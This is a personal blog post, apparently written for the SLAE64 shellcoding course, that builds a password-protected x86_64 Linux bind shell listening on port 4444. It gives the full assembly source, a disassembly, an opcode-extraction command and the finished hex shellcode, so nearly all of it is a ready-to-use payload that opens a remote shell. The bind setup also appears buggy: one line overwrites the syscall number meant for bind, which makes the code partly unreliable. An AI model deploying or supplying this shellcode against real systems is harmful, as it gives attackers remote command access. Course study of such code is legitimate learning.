Sunday, May 7, 2017

Linux x86_64 Bind Shell w/ password

Here is the second assignment for the x86_64 Assembly and Shellcoding Expert (SLAE64) certification. The goal of the assignment was to write a bind shell that requires a password to use. This one was a bit more difficult than the reverse shell in my opinion. The shell itself wasn't too bad, but the whole password thing took me a bit to get right. The shell kept hanging after it executed and wouldn't respond to input. Not exactly sure what was wrong, but it worked after starting from scratch a second time. I'm sure the issue was somewhere in the read() syscall.


global _start
section .text

_start:

 ; sock = socket(AF_INET, SOCK_STREAM, 0)
 ; AF_INET = 2
 ; SOCK_STREAM = 1
 ; syscall number 41 

 xor rax, rax
 mov al, 41
 xor rdi, rdi 
 mov dil, 2
 xor rsi, rsi 
 mov sil, 1
 xor rdx, rdx 
 syscall

 ; copy socket descriptor to rdi for future use 

 mov rdi, rax


 ; server.sin_family = AF_INET 
 ; server.sin_port = htons(PORT)
 ; server.sin_addr.s_addr = INADDR_ANY
 ; bzero(&server.sin_zero, 8)

 xor rax, rax 
 push rax
 mov dword [rsp-4], eax
 mov word [rsp-6], 0x5c11          ; port 4444
 mov byte [rsp-8], 0x2
 sub rsp, 8


 ; bind(sock, (struct sockaddr *)&server, sockaddr_len)
 ; syscall number 49

 xor rax, rax
 mov al, 49
 
 mov rsi, rsp
 xor rdx, rdx 
 mov al, 16
 syscall


 ; listen(sock, MAX_CLIENTS)
 ; syscall number 50
 
 xor rax, rax
 mov al, 50
 xor rsi, rsi 
 mov sil, 2
 syscall


 ; new = accept(sock, (struct sockaddr *)&client, &sockaddr_len)
 ; syscall number 43

 
 xor rax, rax
 mov al, 43
 sub rsp, 16
 mov rsi, rsp
 push 16
 mov rdx, rsp
 syscall

 mov r9, rax                     ; store the client socket description 
 xor rax, rax                    ; close parent      
 mov al, 3
 syscall

 xchg rdi , r9
 xor rsi , rsi

 ; duplicate sockets

dup2:
 push 0x21
 pop rax
 syscall
 inc rsi
 cmp rsi , 0x2
 loopne dup2


Checkpass:
     
 xor rax , rax
 push 0x10
 pop rdx
 sub rsp , 16                 ; 16 bytes to receive user input 
 mov rsi , rsp
 xor edi , edi
 syscall                      ; read()
 mov rax , 0x64726f7773736150 ; "Password"
 lea rdi , [rel rsi]
 scasq
 jz Shell
 push 0x3c
 pop rax
 syscall
 
Shell:

 xor rax, rax                   ; First NULL push
 push rax
 mov rbx, 0x68732f2f6e69622f    ; push /bin//sh in reverse
 push rbx
 mov rdi, rsp                   ; store /bin//sh address in RDI
 push rax                       ; Second NULL push
 mov rdx, rsp                   ; set RDX
 push rdi                       ; Push address of /bin//sh
 mov rsi, rsp                   ; set RSI 

 
 ; Call the Execve syscall

 add rax, 59
 syscall

 

Compile it with nasm

nasm -f elf64 MyBindShell.nasm -o bindshell.o

Looking for nulls in objdump

objdump -d bindshell.o -M intel

bindshell.o:     file format elf64-x86-64

Disassembly of section .text:

0000000000000000 <_start>:
   0:    48 31 c0                 xor    rax,rax
   3:    b0 29                    mov    al,0x29
   5:    48 31 ff                 xor    rdi,rdi
   8:    40 b7 02                 mov    dil,0x2
   b:    48 31 f6                 xor    rsi,rsi
   e:    40 b6 01                 mov    sil,0x1
  11:    48 31 d2                 xor    rdx,rdx
  14:    0f 05                    syscall
  16:    48 89 c7                 mov    rdi,rax
  19:    48 31 c0                 xor    rax,rax
  1c:    50                       push   rax
  1d:    89 44 24 fc              mov    DWORD PTR [rsp-0x4],eax
  21:    66 c7 44 24 fa 11 5c     mov    WORD PTR [rsp-0x6],0x5c11
  28:    c6 44 24 f8 02           mov    BYTE PTR [rsp-0x8],0x2
  2d:    48 83 ec 08              sub    rsp,0x8
  31:    48 31 c0                 xor    rax,rax
  34:    b0 31                    mov    al,0x31
  36:    48 89 e6                 mov    rsi,rsp
  39:    48 31 d2                 xor    rdx,rdx
  3c:    b0 10                    mov    al,0x10
  3e:    0f 05                    syscall
  40:    48 31 c0                 xor    rax,rax
  43:    b0 32                    mov    al,0x32
  45:    48 31 f6                 xor    rsi,rsi
  48:    40 b6 02                 mov    sil,0x2
  4b:    0f 05                    syscall
  4d:    48 31 c0                 xor    rax,rax
  50:    b0 2b                    mov    al,0x2b
  52:    48 83 ec 10              sub    rsp,0x10
  56:    48 89 e6                 mov    rsi,rsp
  59:    6a 10                    push   0x10
  5b:    48 89 e2                 mov    rdx,rsp
  5e:    0f 05                    syscall
  60:    49 89 c1                 mov    r9,rax
  63:    48 31 c0                 xor    rax,rax
  66:    b0 03                    mov    al,0x3
  68:    0f 05                    syscall
  6a:    49 87 f9                 xchg   r9,rdi
  6d:    48 31 f6                 xor    rsi,rsi

0000000000000070 <dup2>:
  70:    6a 21                    push   0x21
  72:    58                       pop    rax
  73:    0f 05                    syscall
  75:    48 ff c6                 inc    rsi
  78:    48 83 fe 02              cmp    rsi,0x2
  7c:    e0 f2                    loopne 70 <dup2>

000000000000007e <Checkpass>:
  7e:    48 31 c0                 xor    rax,rax
  81:    6a 10                    push   0x10
  83:    5a                       pop    rdx
  84:    48 83 ec 10              sub    rsp,0x10
  88:    48 89 e6                 mov    rsi,rsp
  8b:    31 ff                    xor    edi,edi
  8d:    0f 05                    syscall
  8f:    48 b8 50 61 73 73 77     movabs rax,0x64726f7773736150
  96:    6f 72 64
  99:    48 8d 3e                 lea    rdi,[rsi]
  9c:    48 af                    scas   rax,QWORD PTR es:[rdi]
  9e:    74 05                    je     a5 <Shell>
  a0:    6a 3c                    push   0x3c
  a2:    58                       pop    rax
  a3:    0f 05                    syscall

00000000000000a5 <Shell>:
  a5:    48 31 c0                 xor    rax,rax
  a8:    50                       push   rax
  a9:    48 bb 2f 62 69 6e 2f     movabs rbx,0x68732f2f6e69622f
  b0:    2f 73 68
  b3:    53                       push   rbx
  b4:    48 89 e7                 mov    rdi,rsp
  b7:    50                       push   rax
  b8:    48 89 e2                 mov    rdx,rsp
  bb:    57                       push   rdi
  bc:    48 89 e6                 mov    rsi,rsp
  bf:    48 83 c0 3b              add    rax,0x3b
  c3:    0f 05                    syscall

00000000000000c5 <Exit>:
  c5:    6a 3c                    push   0x3c
  c7:    58                       pop    rax
  c8:    48 31 ff                 xor    rdi,rdi
  cb:    0f 05                    syscall

No nulls! Time to pull the hex out of the objdump output.


for i in $(objdump -d bindshell.o -M intel |grep "^ " |cut -f2); do echo -n '\x'$i; done;echo

\x48\x31\xc0\xb0\x29\x48\x31\xff\x40\xb7\x02\x48\x31\xf6\x40\xb6\x01\x48\x31\xd2\x0f\x05\x48\x89\xc7\x48\x31\xc0\x50\x89\x44\x24\xfc\x66\xc7\x44\x24\xfa\x11\x5c\xc6\x44\x24\xf8\x02\x48\x83\xec\x08\x48\x31\xc0\xb0\x31\x48\x89\xe6\x48\x31\xd2\xb0\x10\x0f\x05\x48\x31\xc0\xb0\x32\x48\x31\xf6\x40\xb6\x02\x0f\x05\x48\x31\xc0\xb0\x2b\x48\x83\xec\x10\x48\x89\xe6\x6a\x10\x48\x89\xe2\x0f\x05\x49\x89\xc1\x48\x31\xc0\xb0\x03\x0f\x05\x49\x87\xf9\x48\x31\xf6\x6a\x21\x58\x0f\x05\x48\xff\xc6\x48\x83\xfe\x02\xe0\xf2\x48\x31\xc0\x6a\x10\x5a\x48\x83\xec\x10\x48\x89\xe6\x31\xff\x0f\x05\x48\xb8\x50\x61\x73\x73\x77\x6f\x72\x64\x48\x8d\x3e\x48\xaf\x74\x05\x6a\x3c\x58\x0f\x05\x48\x31\xc0\x50\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x48\x89\xe7\x50\x48\x89\xe2\x57\x48\x89\xe6\x48\x83\xc0\x3b\x0f\x05\x6a\x3c\x58\x48\x31\xff\x0f\x05


No comments:

Post a Comment